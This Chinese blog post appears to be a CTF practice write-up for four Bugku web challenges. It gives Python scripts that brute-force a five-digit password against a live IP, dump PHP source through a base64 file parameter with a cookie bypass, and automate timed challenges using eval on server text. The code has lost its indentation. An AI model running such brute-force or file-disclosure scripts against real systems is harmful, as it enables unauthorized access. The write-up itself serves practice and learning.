周练6(python脚本)
------------恢复内容开始------------
1.bugku-好像需要密码
POST /?yes HTTP/1.1
Host: 114.67.175.224:11711
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 9
Origin: http://114.67.175.224:11711
Connection: close
Referer: http://114.67.175.224:11711/?yes
Upgrade-Insecure-Requests: 1 pwd=12345
import requests
import sys
from multiprocessing.dummy import Pool
def run(i):
myobj = {'pwd': i}
print("正在测试:")
print(i)
x = requests.post('http://114.67.175.224:11711/?yes', data = myobj)
if 'flag' in x.text:
print('正确的密码为:')
print(i)
sys.exit(i)
return i
else:
return 0
num=[]
for i in range(10000,99999):
num.append(i)
pool=Pool(5)#5进程
result = pool.map(run,num)
不比burpsuite快多少
2.bugku-cookies
?line=&filename=a2V5cy50eHQ=
a2V5cy50eHQ=解密为keys.txt,且line=0时回显,1,2,3都不回显
则http://114.67.175.224:19757/index.php?line=0&filename=aW5kZXgucGhw查看index.php文件第一行
脚本解决(因为网页简单故省略正则)
import requests
import string
import re
with open('source.txt','w', encoding='UTF-8') as f:
for i in range(0,50):
payload = "http://114.67.175.224:19757/index.php?line=" + str(i) +"&filename=aW5kZXgucGhw"
x=requests.get(payload)
m=x.content.decode()
f.write(m)
<php
error_reporting(0);
$file=base64_decode(isset($_GET['filename'])?$_GET['filename']:"");
$line=isset($_GET['line'])?intval($_GET['line']):0;
if($file=='') header("location:index.php?line=&filename=a2V5cy50eHQ=");
$file_list = array(
'0' =>'keys.txt',
'1' =>'index.php',
); if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='margin'){
$file_list[2]='keys.php';
} if(in_array($file, $file_list)){
$fa = file($file);
echo $fa[$line];
?>
分析后端源码的意思:
if(isset($_COOKIE[‘margin’]) && $_COOKIE[‘margin’]==‘margin’){
$fa = file($file);
查看keys.php发现flag
3.秋名山车神
亲请在2s内计算老司机的车速是多少
import re
import requests
url="http://114.67.175.224:16740/"
s=requests.session()
text=s.get(url).text
fun = re.search('<div>(.*?)=',text, re.S).group(1)
num=eval(fun)
key={'value':num}
flag=s.post(url,data=key)
print(flag.text)
注意利用了eval字符转换的特性,num值会因session改变
其他都是爬虫基础
4.速度要快
响应包
HTTP/1.1 200 OK
Date: Sat, 25 Jun 2022 16:32:09 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.6
Set-Cookie: PHPSESSID=sohpph0agi7uj9stbgigar00m6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
flag: 6LeR55qE6L+Y5LiN6ZSZ77yM57uZ5L2gZmxhZ+WQpzogTVRFM056azM=
Vary: Accept-Encoding
Content-Length: 89
Connection: close
Content-Type: text/html;charset=utf-8
</br>ææè§ä½ å¾å¿«ç¹!!!<!-- OK ,now you have to post the margin what you find -->
import requests
import base64
import re
s = requests.session() #建立会话
url = "http://114.67.175.224:16031/"
head = s.get(url).headers #返回字典
result = head['flag']
result = base64.b64decode(result).decode('utf-8') #第一次解码
result = re.findall('(\w*)', result,re.S)
result = base64.b64decode(result[5]).decode('utf-8') #第二次解码
payload = {'margin': result}
print(s.post(url, data=payload).text)
与3类似,正则是凑出来的...将就看吧
最新文章
- html5吹牛扯淡篇,闲话内容。
- jqgrid no url reset
- 用FireFox火狐浏览器的3D Tilt 插件查看网页3D视图效果
- JavaWeb---通过ServletConfig获取Servlet的初始化参数
- C++ 关联容器
- Coursera台大机器学习课程笔记10 -- Linear Models for Classification
- document.execCommand()命令小计
- sqlexpress 不用管理工具 sa
- Offer_1
- bzoj 3519: [Zjoi2014] 消棋子 题解
- MapReduce,DataJoin,链接多数据源
- JAVA 基础之Integer
- 微信号的openid的深入理解
- 优化之Sequence Generator组件
- 用命令创建MySQL数据库
- 【spark 深入学习 05】RDD编程之旅基础篇-01
- [No0000E3]C# 数据类型
- Facade 设计模式
- php连接mssql
- 每日英语:Prosecutors Wrap Up Case Against Bo
热门文章
- 还原火山引擎 A/B 测试产品——DataTester 私有化部署实践经验
- CH32V307 内部10M网络工程创建流程
- Miller-Rabin 与 Pollard-Rho 算法学习笔记
- NSOperation的简单使用
- SpringMVC学习笔记 - 第二章 - SSM整合案例 - 技术整合、统一结果封装、统一异常处理、前后联调、拦截器
- Object类中wait带参方法和notifyAll方法-线程间通信
- Java 进阶P-8.13+P-8.14
- 【随笔记】NDK 编译开源库 SQLite3
- 虚拟DOM中给同一层级的元素设置固定且唯一的key为什么能提高性能
- Python标准库pathlib及实例操作